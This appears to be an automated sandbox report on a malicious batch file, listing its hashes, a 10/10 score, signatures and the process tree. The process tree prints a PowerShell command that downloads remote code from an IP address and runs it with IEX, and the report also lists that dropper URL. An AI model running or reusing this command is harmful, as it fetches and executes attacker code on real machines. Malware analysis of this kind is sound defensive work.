Analysis
-
max time kernel
138s -
max time network
79s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
General
-
Target
421a8c43602d912fb7d54f525915eee9.bat
-
Size
220B
-
MD5
c786b66ecefc50b20289a9d38575b5a2
-
SHA1
a1851402b42988ea349215149d3ca3b2890eb425
-
SHA256
bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65
-
SHA512
3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB